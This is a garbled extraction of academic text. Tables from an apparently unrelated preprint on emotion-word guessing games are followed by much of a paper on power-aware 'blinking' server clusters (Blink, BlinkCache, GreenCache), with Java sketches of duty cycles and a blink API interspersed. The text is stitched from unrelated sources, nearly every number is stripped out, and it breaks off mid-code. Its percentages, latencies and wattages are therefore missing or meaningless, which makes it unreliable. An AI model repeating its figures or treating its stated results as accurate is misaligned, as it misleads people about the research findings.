/peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts table : emotion words from human-human emo q matches. matches that terminated with words that the answerers felt to be synonyms are denoted by parentheses. emotions (synonyms) count # correct ... emotions (synonyms) count # correct admiration guilt adoration happiness affection (love) helplessness amusement hope (feeling lucky) anger insecurity (shyness) annoyance (irritated) jealousy (envy) anxiety joy apathy (uninterested) loneliness awe love boredom madness (anger) bravery melancholy calm pity (sympathy) cheerfulness pride confidence proud confusion regret contempt relief contentment (calm) sadness depression (misery) satisfaction devastation serenity disappointment shame disgust shock dread (hopelessness) shyness eagerness (determination) silly embarrassment soberness enthusiasm (eagerness) sorrow (sadness) envy (jealousy) stress exasperation suffering excitement surprise exhilaration (thrill) tense (uncomfortable) exhaustion terror fear (distress,scared) thankful frustration thrill (entrancement) fury tiredness glee wariness gratefulness worry (anxiety, scared) grumpiness total peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts table : examples of some of the questions that occurred multiple times (disregarding case and punctuation). question count is it positive? ok is it a positive emotion? is it a positive emotion? is it intense? ok is it positive? is it a strong emotion? is it like sadness? is it sadness? is it pride? is it neutral? is it like anger? is it surprise? is it an emotion that makes you feel good? thrilled? regret? pleased? is it very intense? is it love? is it kinda like anger? is it associated with sadness? ... ... ok is it a negative emotion? ok is it a good emotion? 
okay is it a strong emotion? is it highly activated? is it directed towards another person? is it directed at another person? is it associated with satisfaction? is it associated with optimism? is it associated with disappointment? is it an emotion that lasts a long time does it vary in intensity? table : examples of question standardization. standardized question examples cause(emptyset,e) can you feel the emotion without any external events that cause it? is it an emotion that just pops up spontaneously (vs being triggered by something)? cause(otherperson,e) is it caused by the person that it’s directed at? do you need someone to pull this emotion out of you or evoke it? if so, who is it? e.valence==negative is it considered a negative thing to feel? ) so is it a negative emotion? situation(e,birthday) would you feel this if it was your birthday? is it a socially acceptable emotion, say, at a birthday party? e==frustration oh, is it frustrated? frustration? peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts table : experimental results for subject pilot study ( emo q games). difficulty % success avg. turns % in vocab. naturalness easy % . % . medium % . % . difficult % . % . total % . % . table : experimental results for subject mechanical turk study ( emo q games). difficulty % success avg. turns % in vocab. easy % . % medium % . % difficult % . % total % . . % table : observed emotion words by difficulty. words that were attested but which did not fit the authors’ broad intuitions are marked with ’ ?’. the same words in multiple categories indicate that different subjects had differing opinions about difficulty. difficulty examples easy happiness, anger, sadness, calm, confusion, love, mad, hate, joy medium anger, confusion, contentment, curiosity, depression, disgust, excitement, fear, hate, irritation, love, melan- choly, sorrow, surprise, tiredness, envy, outrage, elation, suffering, jealousy, nervousness, sympathy, thrill, upset, joy, anxiety, frustration, flustered, enjoyment, exhaustion, fury, bordom, delight, cold, apathy, hos- tility, loved, annoyance, playfulness, downtrodden, stupor, despair, pissed, nostalgia, overjoyed, indifference, courage difficult devastation, disgust, ecstasy, ennui, frustration, guilt, hope, irritation, jealousy, morose, proud, remorse, vin- dication, zealousness, elation, mischievous, usure, angst, patience, despise, inspired, euphoria, exuberance, worrying, melancholy, ambivalence, love, loneliness, exacerbated(?), avarace, stress, envy, disillusionment, maudlin, depression, confusion, maniacal, ambiguity, concern, pleasure, shame, indifference, anger, suicidal, pessimism, annoyance, sense of failure, educated(?), manic, overwhelmed, astounded, discontent, energetic, introspective, appalled, serenity, dissatisfaction, anxiety, lust, conflicted, perplexed, jubilance, disappoint- ment, satisfaction, remorse, embarrassment, downcast, guilty, enamored, alienation, exotic(?), hate, caring, resentment, pity, aversion, quixotic, infuriation peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts managing server clusters on intermittent power submitted july accepted november published december corresponding author navin sharma, nksharma@cs.umass.edu academic editor srikumar venugopal additional information and declarations can be found on page doi . /peerj-cs. copyright sharma et al. distributed under creative commons cc-by . 
open access managing server clusters on intermittent power navin sharma , dilip krishnappa , sean barker , david irwin and prashant shenoy college of information and computer sciences, university of massachusetts at amherst, amherst, ma, united states akamai technologies, cambridge, ma, united states department of computer science, bowdoin college, brunswick, me, united states electrical and computer engineering, university of massachusetts at amherst, amherst, ma, united states abstract reducing the energy footprint of data centers continues to receive significant attention due to both its financial and environmental impact. there are numerous methods that limit the impact of both factors, such as expanding the use of renewable energy or participating in automated demand-response programs. to take advantage of these methods, servers and applications must gracefully handle intermittent constraints in their power supply. in this paper, we propose blinking—metered transitions between a high-power active state and a low-power inactive state—as the primary abstraction for conforming to intermittent power constraints. we design blink, an application-independent hardware–software platform for developing and evaluating blinking applications, and define multiple types of blinking policies. we then use blink to design both a blinking version of memcached (blinkcache) and a multimedia cache (greencache) to demonstrate how application characteristics affect the design of blink-aware distributed applications. our results show that for blinkcache, a load-proportional blinking policy combines the advantages of both activation and synchronous blinking for realistic zipf-like popularity distributions and wind/solar power signals by achieving near optimal hit rates (within % of an activation policy), while also providing fairer access to the cache (within % of a synchronous policy) for equally popular objects. in contrast, for greencache, due to multimedia workload patterns, we find that a staggered load proportional blinking policy with replication of the first chunk of each video reduces the buffering time at all power levels, as compared to activation or load-proportional blinking policies. subjects distributed and parallel computing, multimedia, operating systems keywords green data center, intermittent power, blink, green cache, memcached, multimedia cache introduction energy-related costs have become a significant fraction of total cost of ownership (tco) in modern data centers. recent estimates attribute % of tco to both purchasing power and building and maintaining the power distribution and cooling infrastructure (hamil- ton, ). consequently, techniques for reducing the energy footprint of data centers how to cite this article sharma et al. ( ), managing server clusters on intermittent power. peerj comput. sci. :e ; doi . /peerj-cs. mailto:nksharma@cs.umass.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. continue to receive significant attention in both industry and the research community. we categorize these techniques broadly as being either primarily workload-driven or power-driven. 
workload-driven systems reconfigure applications as their workload demands vary to use the least possible amount of power to satisfy demand (ahmad & vijaykumar, ; moore, chase & ranganathan, ; moore et al., ). in contrast, power-driven systems reconfigure applications as their power supply varies to achieve the best performance possible given the power constraints. while prior work has largely emphasized workload-driven systems, power-driven systems are becoming increasingly important. for instance, data centers are beginning to rely on intermittent renewable energy sources, such as solar and wind, to partially power their operations (gupta, ; stone, ). intermittent power constraints are also common in developing regions that experience “brownouts” where the electric grid temporarily reduces its supply under high load (chase et al., ; verma et al., ). the key challenge in power-driven systems is optimizing application performance in the presence of power constraints that may vary significantly and frequently over time. importantly, these power and resource consumption constraints are independent of workload demands. the ability to use intermittent power introduces other opportunities, beyond increasing use of renewable energy, for optimizing a data center to be cheaper, greener, and more reliable. we argue that designing systems to exploit these optimizations will move us closer to the vision of a net-zero data center. • market-based electricity pricing. electricity prices vary continuously based on supply and demand. many utilities now offer customers access to market-based rates that vary every five minutes to an hour (elevate energy, ). as a result, the power data centers are able to purchase for a fixed price varies considerably and frequently over time. for instance, in the new england hourly wholesale market in , maintaining a fixed $ /h budget, rather than a fixed per-hour power consumption, purchases % more power for the same price (fig. ). the example demonstrates that data centers that execute delay-tolerant workloads, such as data-intensive batch jobs, have an opportunity to reduce their electric bill by varying their power usage based on price. • unexpected blackouts or brownouts. data centers often use upss for backup power during unexpected blackouts. an extended blackout may force a data center to limit power consumption at a low level to extend ups lifetime. while low power levels impact performance, it may be critical for certain applications to maintain some, even low, level of availability, e.g., disaster response applications. as we discuss, maintaining availability at low power levels is challenging if applications access distributed state. further, in many developing countries, the electric grid is highly unstable with voltage rising and falling unexpectedly based on changing demands. these “brownouts” may also affect the power available to data centers over time. • % power infrastructure utilization. another compelling use of intermittent power is continuously operating a data center’s power delivery infrastructure at %. since sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
figure electricity prices vary every five minutes to an hour in wholesale markets, resulting in the power available for a fixed monetary budget varying considerably over time data center capital costs are enormous, maximizing the power delivery infrastructure’s utilization by operating as many servers as possible is important. however, data centers typically provision power for peak demands, resulting in low utilization (fan, weber & barroso, a; kontorinis et al., ). in this case, intermittent power is useful to continuously run a background workload on a set of servers—designed explicitly for intermittent power—that always consume the excess power pdus are capable of delivering. since the utilization (and power usage) of a data center’s foreground workload may vary rapidly, the background servers must be capable of quickly varying power usage to not exceed the power delivery infrastructure’s limits. in this paper, we present blink, a new energy abstraction for gracefully handling intermittent power constraints. blinking applies a duty cycle to servers that controls the fraction of time they are in the active state, e.g., by activating and deactivating them in succession, to gracefully vary their energy footprint. for example, a system that blinks every s, i.e., is on for s and then off for s, consumes half the energy, modulo overheads, of an always-on system. blinking generalizes the extremes of either keeping a server active (a % duty cycle) or inactive (a % duty cycle) by providing a spectrum of intermediate possibilities. blinking builds on prior work in energy-aware design. first, several studies have shown that turning a server off when not in use is the most effective method for saving energy in server clusters (chase et al., ; pinheiro et al., ). second, blinking extends the powernap (meisner, gold & wenisch, ) concept, which advocates frequent transitions to a low-power sleep state, as an effective means of reducing idle power waste. an application’s blinking policy decides when each node is active or inactive at any instant based on both its workload characteristics and energy constraints. clearly, blinking impacts application performance, since there may not always be enough energy to power sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the nodes necessary to meet demand. hence, the goal of a blinking policy is to minimize performance degradation as power varies. in general, application modifications are nec- essary to adapt traditional server-based applications for blinking, since these applications implicitly assume always-on, or mostly-on, servers. blinking forces them to handle regular disconnections more often associated with weakly connected (terry et al., ) environ- ments, e.g., mobile, where nodes are unreachable whenever they are off or out of range. example applications for blink to demonstrate how blinking impacts common data center applications, we explore the design of blinkcache—a blinking version of memcached that gracefully handles intermittent power constraints and greencache—a distributed cache for multimedia data that runs off renewable energy—as proof-of-concept examples. memcached is a distributed memory cache for storing key-value pairs that many prominent internet sites, including livejournal, facebook, flickr, twitter, youtube, and others, use to improve their performance. 
for internet services that store user-generated content, the typical user is often interested in the relatively unpopular objects in the heavy tail, since these objects represent either their personal content or the content of close friends and associates. as one example, fig. depicts a popularity distribution for facebook group pages in terms of their number of fans. while the figure only shows the popularity rank of the top , pages, facebook has over million group pages in total. most of these pages are nearly equally unpopular. for these equally unpopular objects, blinking nodes synchronously to handle variable power constraints results in fairer access to the cache because the probability of finding an object becomes equal for all objects in the cache. while fair cache access is important, maximizing memcached’s hit rate requires prioritizing access to the most popular objects. we explore these performance tradeoffs in-depth for a memcached cluster with intermittent power constraints. in contrast, greencache leverages the blinking abstraction to modulate its energy footprint to match available power while minimizing both backhaul bandwidth and client access latency for a large video library. as discussed above, minimizing bandwidth usage (or cost) and maximizing users’ experience, e.g., by reducing buffering time, are the two primary goals of a multimedia cache. we analyze video traffic behavior of a large number of users for the most popular user-generated video site, youtube, and exploit traffic characteristics and video properties to design new placement and blinking policies for minimizing bandwidth usage and maximizing users’ experience. contributions in designing, implementing, and evaluating blinkcache and greencache as proof- of-concept examples of using the blink abstraction, this paper makes the following contributions. this paper combines and extends two prior conference publications: blink (sharma et al., ) and greencache (sharma et al., ). in addition to rewriting this paper from the ground up to merge our prior work, we have also designed (a) a blink emulator to emulate a renewable-powered server cluster and (b) used the emulator for scalability analysis of blinking applications on large server clusters. • make the case for blinking systems. we propose blinking systems to deal with variable power constraints in server clusters. we motivate why blinking is a beneficial abstraction sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the popularity of web data often exhibits a long heavy tail of equally unpopular objects. this graph ranks the popularity of facebook group pages by their number of fans. for dealing with intermittent power constraints, define different types of blinking policies, and discuss its potential impact on a range of distributed applications. • design a blinking hardware/software platform. we design blink, an application- independent hardware/software platform to develop and evaluate blinking applications. our small-scale prototype uses a cluster of low-power motherboards connected to a programmable power meter that replays custom power traces and variable power traces from a solar and wind energy harvesting deployment. • design, implement, evaluate blinkcache and greencache. 
we use blink to experi- ment with blinking policies for blinkcache and greencache, a variant of memcached and multimedia cache, respectively, and optimize the performance for intermittent power constraints. for blinkcache, our hypothesis is that a load-proportional blinking policy, which keeps nodes active in proportion to the popularity of the data they store, combined with object migration to group together objects with similar popularities, results in near optimal cache hit rates, as well as fairness for equally unpopular objects. to validate our hypothesis, we compare the performance of activation, synchronous, and load-proportional policies for realistic zipf-like popularity distributions. we show that a load-proportional policy is significantly more fair than an optimal activation policy for equally popular objects ( x at low power) while achieving a comparable hit rate (over % at low power). for greencache, our hypothesis is that a staggered load proportional policy which keeps the nodes active based on their load and the available power in staggered manner, with replication of the first chunk of each video on all servers, yields lower buffering time for clients, compared to activation or load-proportional blinking policies, when operating under variable power. • blinking scalability performance. to see how blinking scales with the size of a cluster we emulate our small-scale server cluster and study the performance of blinkcache sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. and greencache for a , node cluster. our hypothesis is that the performance of a blinking policy should be independent of the cluster size. ‘blink: rationale and overview’ provides an overview of the blinking abstraction and various blinking policies. ‘blink prototype’ presents blink’s hardware and software archi- tecture in detail, while ‘blinkcache: blinking memcached’ presents design alternatives for blinkcache, a blinking version of memcached. ‘greencache: blinking multimedia cache’ presents the design techniques for greencache, a blinking version of multimedia cache. we provide the implementation and evaluation of both applications in ‘implementation’ and ‘evaluation’, respectively. finally, ‘related work’ discusses related work, ‘applicability of blinking’ outlines the applicability of blinking to other applications, and ‘conclusion’ concludes. blink: rationale and overview today’s computing systems are not energy-proportional (barroso & hölzle, )—a key factor that hinders data centers from effectively varying their power consumption by controlling their utilization. designing energy-proportional systems is challenging, in part, since a variety of server components, including the cpu, memory, disk, motherboard, and power supply, now consume significant amounts of power. thus, any power optimization that targets only a single component is not sufficient for energy-proportionality, since it reduces only a fraction of the total power consumption (barroso & hölzle, ; le sueur & heiser, ). as one example, due to the power consumption of non-cpu components, a modern server that uses dynamic voltage and frequency scaling in the cpu at low utilization may still operate at over % of its peak power (anderson et al., ; tolia et al., ). 
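as a rough illustration of this energy-proportionality gap, the sketch below models server power as an idle floor plus a utilization-dependent term; the wattages are hypothetical and only meant to show why a server at low utilization still draws a large fraction of its peak power.

```java
// illustrative only: a non-energy-proportional server draws much of its peak power even when idle.
public class EnergyProportionality {
    // simple linear model: p(u) = pIdle + (pPeak - pIdle) * u, with utilization u in [0, 1]
    static double powerWatts(double pIdleW, double pPeakW, double utilization) {
        return pIdleW + (pPeakW - pIdleW) * utilization;
    }

    public static void main(String[] args) {
        double pIdleW = 150, pPeakW = 250;   // hypothetical wattages
        for (double u : new double[] {0.0, 0.1, 0.5, 1.0}) {
            double p = powerWatts(pIdleW, pPeakW, u);
            System.out.printf("utilization %3.0f%% -> %.0f W (%.0f%% of peak)%n",
                    u * 100, p, 100 * p / pPeakW);
        }
    }
}
```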
thus, deactivating entire servers, including most of their components, remains the most effective technique for controlling energy consumption in server farms, especially at low power levels that necessitate operating servers well below % peak power on average. however, data centers must be able to rapidly activate servers whenever workload demand increases. powernap (meisner, gold & wenisch, ) proposes to eliminate idle power waste and approximate an energy-proportional server by rapidly transitioning the entire server between a high-power active state and a low-power inactive state. powernap uses the acpi s state, which places the cpu and peripheral devices in sleep mode but preserves dram memory state, to implement inactivity. transition latencies at millisecond-scale, or even lower, may be possible between acpi's fully active s state and its s state. by using s to emulate the inactive "off" state, powernap is able to consume minimal energy while sleeping (we use "active" and "on" interchangeably to reference acpi's s state, and "inactive" and "off" interchangeably to represent acpi's s state). typical high-end servers draw as much as × less power in s .

blink extends powernap in important ways. first, powernap is a workload-driven technique that eliminates idle server power waste—it uses rapid transitions in a workload-driven fashion to activate each server when work arrives and deactivate it when idle. in contrast, blink is a power-driven technique that regulates average node power consumption independent of workload demands. second, the powernap mechanism applies to each server independently, while blink applies to collections of servers. blinking policies, which we formally define next, are able to capture, and potentially exploit, cross-server dependencies and correlations in distributed applications. finally, unlike workload-driven transitions, blinking provides benefits even for the non-ideal s transition latencies on the order of seconds that are common in practice, as we show in 'balancing performance and fairness.' table shows s transition latencies for a variety of platforms, as reported in agarwal et al. ( ), with the addition of blink's olpc-x nodes. as a point of comparison, powernap's on-demand transitions show little benefit once latencies exceed ms (meisner, gold & wenisch, ). the latencies include both hardware transitions, as well as the time to restart the os and reset its ip address.

table latencies for several desktop and laptop models to perform a complete s cycle (suspend and resume).
type model s transition time (s)
desktop optiplex .
desktop dimension .
laptop lenovo x .
laptop lenovo t .
laptop toshiba m .
laptop olpc-xo (w/nic) .
laptop olpc-xo (no nic) .

definition . the blink state of each node i is defined by two parameters that determine its duty cycle di: (i) the length of the on interval ton, and (ii) the length of the off interval toff, such that di = ton / (ton + toff) · 100%.

definition . a blink policy defines the blink state of each node in a cluster, as well as a blink schedule for each node. the blink schedule defines the clock time at which a specified node transitions its blink state to active, which in turn dictates the time at which the node turns on and goes off. the schedule allows nodes to synchronize their blinking with one another, where appropriate.
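the two definitions above can be captured in a small data structure: a per-node blink state (ton, toff) that induces a duty cycle, plus the clock time at which the node becomes active so that nodes can align their active intervals. the class and field names below are illustrative, not taken from the blink prototype.

```java
// sketch of definition 1 (blink state) and definition 2 (blink schedule); names are illustrative.
public class BlinkSchedule {
    static class BlinkState {
        final int nodeId;
        final long tOnMillis;    // length of the on interval
        final long tOffMillis;   // length of the off interval
        final long startMillis;  // clock time at which the node transitions to active

        BlinkState(int nodeId, long tOnMillis, long tOffMillis, long startMillis) {
            this.nodeId = nodeId;
            this.tOnMillis = tOnMillis;
            this.tOffMillis = tOffMillis;
            this.startMillis = startMillis;
        }

        // duty cycle d_i = t_on / (t_on + t_off) * 100%
        double dutyCyclePercent() {
            return 100.0 * tOnMillis / (tOnMillis + tOffMillis);
        }

        // whether this node is active at a given (synchronized) clock time
        boolean isActiveAt(long clockMillis) {
            long interval = tOnMillis + tOffMillis;
            long offset = Math.floorMod(clockMillis - startMillis, interval);
            return offset < tOnMillis;
        }
    }

    public static void main(String[] args) {
        // two nodes with the same 50% duty cycle whose active intervals are synchronized
        BlinkState a = new BlinkState(1, 25_000, 25_000, 0);
        BlinkState b = new BlinkState(2, 25_000, 25_000, 0);
        System.out.println(a.dutyCyclePercent() + "% duty cycle; both active at t=10s: "
                + (a.isActiveAt(10_000) && b.isActiveAt(10_000)));
    }
}
```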
for example, if node a frequently accesses disk files stored on node b, the blink policy should specify a schedule such that the nodes synchronize their active intervals. to illustrate how a data center employs blinking to regulate its aggregate energy usage, consider a scenario where the energy supply is initially plentiful and there is sufficient workload demand for all nodes. in this case, a feasible policy is to keep all nodes continuously on. next assume that the power supply drops by %, and hence, the data center must reduce its aggregate energy use by %. there are several blinking policies that are able to satisfy this % drop. in the simplest case, % of the nodes are turned off, while the remaining nodes continue to stay on. alternatively, another blinking policy may specify a duty cycle of di = % for every node i. there are also many ways to achieve a per-server duty cycle of % by setting different ton and toff intervals, e.g., ton = s and toff = s or ton = ms and toff = ms. yet another policy may assign different blink states to different nodes, e.g., depending on their loads, such that aggregate usage decreases by %. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. we refer to the first policy in our example above as an activation policy. an activation policy only varies the number of active servers at each power level (chase et al., ; tolia et al., ), such that some servers are active, while others are inactive; the energy supply dictates the size of the active server set. in contrast, synchronous policies toggle all nodes between the active and inactive state in tandem. in this case, all servers are active for ton seconds and then inactive for toff seconds, such that total power usage over each duty cycle matches the available power. of course, since a synchronous policy toggles all servers to active at the same time, it does not reduce peak power, which has a significant impact on the cost of energy generation. an asynchronous policy may randomize the start of each node’s active interval to decrease peak power without changing the average power consumption across all nodes. in contrast to an asynchronous policy, an asymmetric policy may blink different nodes at different rates, while ensuring the necessary change in the energy footprint. for example, an asymmetric policy may be load-proportional and choose per-node blink states that are a function of current load. finally, a staggered blinking policy is a type of asynchronous policy that staggers the start time of all nodes equally across each blink interval. a staggered policy that reduces the energy footprint by blinking nodes in proportion to the current load at each node is called staggered load-proportional policy. blink and blink policies are designed to cap power consumption of a server cluster to the power supply. all of the policies above are equally effective at capping the average power consumption for a variable power signal over any time interval. however, the choice of the blink policy greatly impacts application performance. although blink’s design is application-independent, applications should be modified and made blink-aware to perform well on a blinking cluster. in this paper, we design blinking policies for two specific types of distributed applications—blinkcache, a blinking version of memcached and greencache, a blinking version of multimedia cache. 
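to make the policy space above concrete, the sketch below shows two ways the same power budget could be turned into per-node duty cycles, one that deactivates a subset of nodes and one that blinks every node at the same rate; the helper names and the example power fraction are assumptions for illustration only.

```java
import java.util.Arrays;

// illustrative only: two ways to meet the same power budget with per-node duty cycles (in %).
public class BlinkPolicies {
    // activation-style policy: keep a subset of nodes fully on, the rest fully off.
    static double[] activation(int numNodes, double powerFraction) {
        double[] duty = new double[numNodes];
        int active = (int) Math.floor(numNodes * powerFraction);
        for (int i = 0; i < active; i++) duty[i] = 100.0;   // first 'active' nodes stay on
        return duty;
    }

    // synchronous-style policy: every node blinks with the same duty cycle.
    static double[] synchronous(int numNodes, double powerFraction) {
        double[] duty = new double[numNodes];
        Arrays.fill(duty, 100.0 * powerFraction);
        return duty;
    }

    public static void main(String[] args) {
        // hypothetical scenario: the supply drops to 50% of peak for a 4-node cluster
        System.out.println("subset on/off: " + Arrays.toString(activation(4, 0.5)));
        System.out.println("uniform blink: " + Arrays.toString(synchronous(4, 0.5)));
    }
}
```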
in designing these policies, we profile application performance for a variety of blinking policies when subjected to different changes in available power. our goal in this paper is to demonstrate the feasibility of running distributed applications while performing well under extreme power constraints; optimizing performance for any specific workload and qos demands is beyond the scope of this paper. blink prototype blink is a combined hardware/software platform for developing and evaluating blinking applications. this section describes our prototype’s hardware and software architecture in detail. blink hardware platform blink’s current hardware platform consists of two primary components: (i) a low-power server cluster that executes blink-aware applications and (ii) a variable energy source constructed using an array of micro wind turbines and solar panels. we use renewable energy to expose the cluster to intermittent power constraints. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. energy sources we deployed an array of two wind turbines and two solar panels to power blink. each wind turbine is a sunforce air-x micro-turbine designed for home rooftop deployment, and rated to produce up to w in steady mph winds. however, in our measurements, each turbine generates approximately w of power on windy days. our solar energy source uses kyocera polycrystalline solar panels that are rated to produce a maximum of w at . v under full sunlight. although polycrystalline panels are known for their efficiency, our measurements show that each panel only generates around w of power in full sunlight and much less in cloudy conditions. we assume blinking systems use batteries for short-term energy storage and power buffering. modern data centers and racks already include ups arrays to condition power and tolerate short-term grid disruptions. we connect both renewable energy sources in our deployment to a battery array that includes two rechargeable deep-cycle resourcepower marine batteries with an aggregate capacity of , watt-hours at v, which is capable of powering our entire cluster continuously for over h. however, in this paper we focus on energy-neutral operation over short time intervals, and thus use the battery array only as a small -minute buffer. we connect the energy sources to the battery pack using a tristar t- charge controller that provides over-charging circuitry. we deployed our renewable energy sources on the roof of a campus building and used a hobo u data logger to gather detailed traces of current and voltage over a period of several months under a variety of different weather conditions. while our energy harvesting deployment is capable of directly powering blink’s server cluster, to enable controlled and repeatable experiments we leverage four extech programmable power supplies. we use the programmable power supplies, instead of the harvesting deployment, to conduct repeatable experiments by replaying harvesting traces, or emulating other intermittent power constraints, to charge our battery array. we are able to set the initial battery level for each experiment using a separate charge controller in load-control mode. since the battery’s voltage level indicates its current energy capacity, we require sensors to measure and report it. we use a data acquisition device (daq) from national instruments to facilitate voltage measurement. as shown in fig. 
, the prototype includes two high-precision mohm resistors between the battery terminals and employs the daq to measure voltage across each resistor. we then use the value to compute the instantaneous battery voltage, and hence, capacity. figure shows the empirically-derived capacity of our prototype’s battery as a function of its voltage level. in addition to battery voltage, we use dc current transducers to measure the current flowing from the energy source into the battery, and the current flowing from the battery to the cluster. the configuration allows blink to accurately measure these values every second. low-power server cluster our blink prototype uses a cluster of low-power server nodes. to match the energy footprint of the cluster with the power output of our energy harvesting deployment we construct our prototype from low-power nodes that use amd geode processor motherboards. each motherboard, which we scavenge from olpc-xo laptops, consists of a mhz amd geode lx cpu, mb ram, a gb solid-state flash disk, and a linksys sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure hardware architecture of the blink prototype. usb ethernet nic. each node runs the fedora linux distribution with kernel version . . . we connect our node cluster together using an energy-efficient switch (netgear gs ) that consumes w. each low-power node consumes a maximum of . w, and together with the switch, the node cluster has a total energy footprint of around w. an advantage of using xo motherboards is that they are specifically optimized for rapid s transitions that are useful for blinking. further, the motherboards use only . w in s and . w in s at full processor and network utilization. the wide power range in these two states combined with the relatively low power usage in s makes these nodes an ideal platform for demonstrating the efficacy of blink’s energy optimizations. though xo motherboards are energy-efficient and consume little power even at full utilization they are not suitable for running applications which require large persistent sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure empirically-measured battery capacity as a function of voltage for our deep-cycle battery. we consider the battery empty below v, since using it beyond this level will reduce its lifetime. storage, such as a multimedia cache. the same design also scales to more powerful servers. as a result, for our multimedia cache application, we design a blink-aware cluster, but we replace xo motherboards with mac minis. each mac mini consists of a . ghz intel core duo processors, gb ram, and a gb flash-based ssd. we boot each mac mini in text mode and unload all unnecessary drivers in order to minimize the time it takes to transition into s . with the optimizations, the time to transition to and from acpi’s s state on the mac mini is one second, and the power consumption in s and s is w and w respectively. blink software architecture blink’s software architecture consists of an application-independent control plane that combines a power management service with per-node access to energy and node-level statistics. blink-aware applications interact with the control plane using blink apis to regulate their power consumption. the power management service consists of a power manager daemon that runs on a gateway node and a power client daemon that runs on each cluster node. 
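returning to the battery instrumentation described above, the power manager needs a voltage-to-capacity mapping like the empirically derived curve mentioned in the text; the sketch below linearly interpolates over a calibration table whose voltage/capacity pairs are placeholders rather than the measured values.

```java
// illustrative only: estimate remaining battery capacity from a measured terminal voltage
// by interpolating over an empirically derived calibration table.
public class BatteryCapacity {
    // placeholder calibration points (volts -> watt-hours); not the measured curve from the paper
    static final double[] VOLTS = {11.8, 12.0, 12.2, 12.4, 12.6, 12.8};
    static final double[] WATT_HOURS = {0, 150, 400, 700, 950, 1200};

    static double capacityWh(double volts) {
        if (volts <= VOLTS[0]) return WATT_HOURS[0];                       // treat as empty
        if (volts >= VOLTS[VOLTS.length - 1]) return WATT_HOURS[WATT_HOURS.length - 1];
        for (int i = 1; i < VOLTS.length; i++) {
            if (volts <= VOLTS[i]) {
                double frac = (volts - VOLTS[i - 1]) / (VOLTS[i] - VOLTS[i - 1]);
                return WATT_HOURS[i - 1] + frac * (WATT_HOURS[i] - WATT_HOURS[i - 1]);
            }
        }
        return WATT_HOURS[WATT_HOURS.length - 1];
    }

    public static void main(String[] args) {
        System.out.printf("12.3 V -> %.0f Wh remaining%n", capacityWh(12.3));
    }
}
```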
the architecture separates mechanism from policy by exposing a single simple interface for applications to control blinking for each cluster node. the power manager daemon has access to the hardware sensors, described above, that monitor the battery voltage and current flow. each blink power client also monitors host-level metrics on each cluster node and reports them to the power manager. these metrics include cpu utilization, network bandwidth, and the length of the current active period. the power client exposes an internal rpc interface to the power manager that allows it to set a node’s blinking pattern. to set the blinking pattern, the power client uses the timer of the node’s real-time clock (rtc) to automatically sleep and wake up, i.e., transition back to s , at specific intervals. thus, the power client is able to set repetitive active and inactive durations. for example, the power manager may set a node to repeatedly be active for s and inactive for s. in this case, the blink interval is s with sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table blink apis for setting per-node blinking schedules. blinking interface setdutycycle(int nodeid, int onpercentage) setblinkinterval(int nodeid, int interval) syncactivetime(int node, long currenttime) forcesleep(int nodeid, int duration) table blink’s measurement apis that applications use to inform their blinking decisions. measurement interface getbatterycapacity() getbatteryenergy() getchargerate(int lastinterval) getdischargerate(int lastinterval) getserverloadstats(int nodeid) the node being active % of the time and inactive % of the time. we assume that nodes synchronize clocks using a protocol, such as ntp, to enable policies that coordinate blink schedules across cluster nodes. the impact of clock synchronization is negligible for our blink intervals at the granularity of seconds, but may become an issue for blink intervals at the granularity of milliseconds or less. note that clock synchronization is not an issue for applications, such as memcached, that do not perform inter-node communication. transitioning between s and s incurs a latency that limits the length of the blink interval. shorter blink intervals are preferable since they allow each node to more closely match the available power, more rapidly respond to changes in supply, and reduces the battery capacity necessary for short term buffering. the xo motherboard yields s sleep latencies that range from roughly ms to s depending on the set of active devices and drivers (see table ). for instance, since our usb nic driver does not implement the acpi reset resume function, we must unload and load its driver when transitioning to and from s . as a result, the latency for xo motherboard is near s. similarly, with similar optimizations, the time to transition to and from acpi’s s state on the mac mini is s. unfortunately, inefficient and incorrect device drivers are commonplace, and represent one of the current drawbacks to blinking in practice. the blink control plane exposes an rpc interface to integrate with external applications as shown in tables and . applications use these apis to monitor input/output current flow, battery voltage, host-level metrics and control per-node blinking patterns. since blink is application-independent, the prototype does not report application-level metrics. 
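to illustrate how an application might drive this control plane, the sketch below wraps the per-node blinking and measurement calls from the two tables in a java interface and uses them to implement a simple synchronous policy; the interface packaging, the parameter and return types not given in the tables, and the power-to-duty-cycle heuristic are assumptions about how the rpc interface could be used, not the prototype's code.

```java
// illustrative wrapper around the blink apis listed in the tables above; types and the
// simple synchronous policy below are assumptions, not the prototype's actual code.
interface BlinkControl {
    // blinking interface (per node)
    void setDutyCycle(int nodeId, int onPercentage);
    void setBlinkInterval(int nodeId, int intervalSec);
    void syncActiveTime(int nodeId, long currentTime);
    void forceSleep(int nodeId, int durationSec);

    // measurement interface
    double getBatteryCapacity();
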